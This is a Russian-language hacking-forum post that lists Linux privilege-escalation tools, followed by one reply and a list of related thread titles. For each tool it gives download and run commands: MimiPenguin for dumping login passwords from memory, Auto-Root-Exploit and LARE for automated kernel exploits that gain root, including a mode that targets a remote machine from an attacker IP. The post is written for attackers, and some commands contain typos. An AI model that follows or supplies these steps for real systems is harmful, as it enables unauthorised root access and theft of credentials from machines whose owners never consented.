Интересно Повышаем привилегии в Linux: TOP утилит

E

_Emma_

c82e09d54a9c0648dca25.png





Повышение привилегий в Linux
Эскалация— Это сложное слово означает повышение привилегий,используя уязвимости в ОС или ПО,позволяет получить доступ к ресурсам которые обычного защищены.




PXEnum
Функция перечисления - является основной задачей данного скрипта.Скрипт отыскивает всю доступную информацию о система.Команды скрипта позволяют быстро находить хеши паролей,содержания директорий,сведения о системи,наличие серверов ,приложений,соеденений,пользователей.

Не требует root прав.Скачиваем скрипт командой ниже:

$ wget https://raw.githubusercontent.com/shawnduong/PXEnum/master/PXEnume.sh



Установка PXEnum:

$ git clone https://github.com/shawnduong/PXEnum.git
$ cd PXEnum/
$ chmod +x PXEnum.sh
$ bash PXEnum.sh



Другой вариант запуска PXEnum:

$ sh PXEnum.sh



MIDA Multitool
Другой интересный инструмент — MIDA Multitool, созданный на базе менее популярных собратьев SysEnum и RootHelper, но предлагающий гораздо больше возможностей.

По воле разработчика MIDA Multitool объединяет в себе отдельные функции своих предшественников, а именно:

  • SysEnum — Bash-скрипт, предназначенный для получения основной информации о системе, включая следующие данные: текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы;
  • RootHelper — призван помочь в деле эскалации привилегий в системе, которая была скомпрометирована, при помощи выполнения ряда перечислений и использования доверительных сценариев.
Установка MIDA Multitool в систему с GitHub:

$ git clone https://github.com/NullArray/Bash-Kit-Multitool
$ cd Bash-Kit-Multitool
$ chmod +x bashkit.sh



Запускаем скрипта MIDA Multitool :

$ /.bashkit.sh

linux-privilege-escalation-1.png

Меню выбора действий после запуска MIDA Multitool


Информация о системе

linux-privilege-escalation-2.jpg

Данные об учетных записях в текущей системе

MimiPenguin
Задача данного скрипта - сброс пароля на вход в систему.Если так можно выразиться это аналог утилиты mimikatz для дампа пароля в Windows

Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), Apache 2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и OpenSSH-сервер (активные подключения SSH с использованием команды sudo). И вообще, необходимо сказать, что MimiPenguin нередко становится частью эксплоитов под Linux, так что тулза очень и очень востребована.



Установка MimiPenguin

$ git clone https://github.com/huntergregal/mimipenguin

linux-privilege-escalation-4.png

Окно терминала, отображающее процесс установки MimiPenguin


Запускаем скрипт,перейдя в его директорию

$ cd mimipenguin
$ ls –a
$ chmod +x mimipenguin.sh
$ ./mimipenguin.sh


linux-privilege-escalation-3.png

Результат работы MimiPenguin — все пароли как на ладони

Auto-Root-Exploit
Скрипт выполняет единственную цель получить root на текущую учётную запись с помощью известных багов.Поддерживает версия ядра Linux Kernel 2.6 - 4.8.0-41-generic

Устанавливаем Auto-Root-Exploit

$ git clone https://github.com/nilotpalbiswas/Auto-Root-Exploit
$ cd Auto-Root-Exploit
$ chmod +x autoroot.sh



Проверка версии ядра

<span class="pln">$ uname </span><span class="pun">–</span><span class="pln">a</span>

linux-privilege-escalation-1.jpg

Получение сведений о версии ядра ОС в Kali Linux


Использование

$ bash autoroot.sh N



for kernel version 2.6 all
bash autoroot.sh 2

for kernel version 3 all
bash autoroot.sh 3

for kernel version 4 all
bash autoroot.sh 4

for freebsd & openbsd all
bash autoroot.sh bsd

for apple macos all
bash autoroot.sh app

for kernel 2.6,3,4 bsd & app all
bash autoroot.sh all



linux-privilege-escalation-.png

Стартовое меню выбора в Auto-Root-Exploit


linux-privilege-escalation-5.png

Результат работы Auto-Root-Exploit — получение root-прав на систему

LARE
На конец ещё один лёгкий скрипт,находя уязвимости в ядре ОС предоставляет root удалённо с атакующей машины.Использует локальные эксплойты для получения root для версий ядра Kernel v2.6 - v4.8



Устанавливаем скрипт LARE

$ git clone https://github.com/EnigmaDimitri/LARE && cd LARE
$ chmod +x LARA.sh



Локальный запуск LARE

$ LARE.sh -a

или

$ ./LARE.sh -a

linux-privilege-escalation-6.png

Запуск LARE на локальной машине


Для запуска скрипта целевой машины в сети:

$ LARE.sh -l [Attackers-IP]

linux-privilege-escalation-7.png

Атака на удаленную машину в локальной сети


Запуск производится с машины подключенной к базе эксплойтов Git Hub

$ LARE.sh -l or ./LARE.sh -l
 
J

Jonny 98200316

Емма вижу ты очень много знаешь если не трудно давай спишемся где то?)
 
Похожие темы
I Взлом joomla (создаем аккаунт и повышаем привелегии) Полезные статьи 0
Admin UFOLABSNEWS Античит-драйвер оказался уязвимым и позволяет повышать привилегии в Windows. Новости в сети 0
Admin Интересно CISA обнаружила уязвимость в плагине LiteSpeed cPanel, позволяющую повысить привилегии до root. Новости в сети 0
Admin Интересно Новая уязвимость MiniPlasma позволяет повысить привилегии до уровня SYSTEM на полностью обновлённых системах Windows. Новости в сети 0
Admin Интересно Обнаружены четыре уязвимости в OpenClaw, позволяющие красть данные и повышать привилегии. Новости в сети 0
Admin Интересно Обнаружены девять уязвимостей в Linux AppArmor, позволяющих повысить привилегии и обойти изоляцию контейнеров. Новости в сети 0
Admin Статья Право на root. Как повышают привилегии в Linux. Уязвимости и взлом 0
Emilio_Gaviriya Статья Уязвимости в ядре Linux и привилегии через nf_tables и ksmbd. Анонимность и приватность 0
Admin Интересно Windows 11 показала тройное превосходство над Linux в локальных ИИ-задачах. Новости в сети 0
Admin UFOLABSNEWS Вредоносный код захватывает устройство раньше, чем запустится Linux. Новости в сети 0
devqp Статья Подключение к корпоративным VPN с Linux VPS через OpenConnect и VPN-Slice Полезные статьи 0
Admin UFOLABSNEWS ИИ обнаружил ошибку в Linux, которая оставалась незамеченной 15 лет. Новости в сети 0
devqp Статья Блокировка WebRTC через UFW для защиты реального IP в Linux Анонимность и приватность 0
Admin UFOLABSNEWS Проект OpenMandriva Linux сообщил о попытке саботажа со стороны участника. Новости в сети 0
Admin UFOLABSNEWS Valve выпустила обновление Proton, которое расширяет совместимость игр для Windows на Linux. Новости в сети 0
Admin UFOLABSNEWS Обнаружена 15-летняя уязвимость GhostLock в ядре Linux, позволяющая получить root-доступ. Новости в сети 0
Admin UFOLABSNEWS Linux в 366 байтах. Конкурс обфусцированного C показал, на что способна простота. Новости в сети 0
Admin UFOLABSNEWS 16-летняя уязвимость в Linux KVM позволяла гостевой системе атаковать физический сервер. Новости в сети 0
Admin UFOLABSNEWS Эксплойт против ядра Linux и Android показал рекордную успешность выполнения на уровне 99 процентов. Новости в сети 0
Admin UFOLABSNEWS Драйвер файловой системы EFS будет удалён из ядра Linux после 20 лет бездействия. Новости в сети 0
Admin UFOLABSNEWS Обзор недели: уязвимости в ядре Linux, новые угрозы с ИИ и вредоносные расширения. Новости в сети 0
Admin UFOLABSNEWS Ядро Linux 7.2 достигло рекордного размера — почти 44 млн строк кода. Новости в сети 0
Admin UFOLABSNEWS Новая уязвимость в Linux позволяет получить права root через кэшированные бинарные файлы. Новости в сети 0
Admin UFOLABSNEWS Русский спам и оскорбления обнаружены в пакетах Arch Linux AUR. Новости в сети 0
Admin Интересно Обнаружена критическая уязвимость в ядре Linux для arm64. Новости в сети 0
Admin Интересно Более 400 пакетов Arch Linux AUR были скомпрометированы для установки вредоносного ПО. Новости в сети 0
Admin Интересно Китайские хакеры скрывались в системе входа Linux почти десять лет. Новости в сети 0
Admin Интересно Уязвимость в ядре Linux позволяет получить права root. Новости в сети 0
Admin Интересно Intel готовит для Linux новый способ соединения компьютеров через USB-кабель. Новости в сети 0
Admin Интересно HP присоединилась к спонсорам проекта Linux Vendor Firmware Service. Новости в сети 0
Admin Интересно Flipper Devices анонсировала карманный компьютер Flipper One на Linux. Новости в сети 0
Admin Интересно Эксплойт PinTheft позволяет получить root-доступ в Arch Linux. Новости в сети 0
Admin Интересно Выпущен PoC для уязвимости DirtyDecrypt в ядре Linux. Новости в сети 0
Admin Интересно Европа финансирует KDE, Франция готовит свой Linux, Нидерланды уходят от Microsoft. Новости в сети 0
Admin Интересно Уникальный руткит OrBit оказался подделкой. Хакеры четыре года ломали Linux открытым кодом с GitHub. Новости в сети 0
Admin Интересно Новая уязвимость Fragnesia в ядре Linux позволяет получить root-доступ через повреждение кэша страниц. Новости в сети 0
Admin Интересно Официальный сайт JDownloader распространял вредоносное ПО для пользователей Windows и Linux. Новости в сети 0
Admin Интересно Обнаружен новый Linux-троян Quasar Linux RAT (QLNX), предназначенный для скрытности и долговременного доступа. Новости в сети 0
Admin Интересно Новая уязвимость Dirty Frag в ядре Linux позволяет получить права root. Новости в сети 0
Admin Интересно Вредоносные пакеты PyPI распространяют ZiChatBot через Zulip API на Windows и Linux. Новости в сети 0
Admin Интересно На PS5 запустили Linux. Sony об этом не знает — и лучше бы не узнавала. Новости в сети 0
Admin Интересно Исследователь взломал PS5 для запуска Linux и игр Steam, опубликовав код. Новости в сети 0
Admin Интересно Обнаружена уязвимость Copy Fail в Linux, позволяющая получить root-доступ. Новости в сети 0
Admin Интересно Франция отказалась от Windows в пользу Linux. Новости в сети 0
Admin Интересно Mac болтает без умолку, а Linux молчит. Разработчик Little Snitch искал тишину и нашел её в Ubuntu. Новости в сети 0
Admin Интересно Microsoft раскрыла детали использования cookie для управления PHP-веб-шеллами на Linux-серверах. Новости в сети 0
Admin Интересно Collabora представила Linux-дистрибутив Apertis 2026 с поддержкой Rust. Новости в сети 0
Admin Интересно Kali Linux 2026.1 представила режим ностальгии по BackTrack 5. Новости в сети 0
Admin Интересно В systemd добавили проверку возраста, что вызвало споры в Linux-сообществе. Новости в сети 0
Admin Интересно Копируй, вставляй, теряй деньги. Новый вирус ClipXDaemon ворует криптовалюту на Linux. Новости в сети 0

Название темы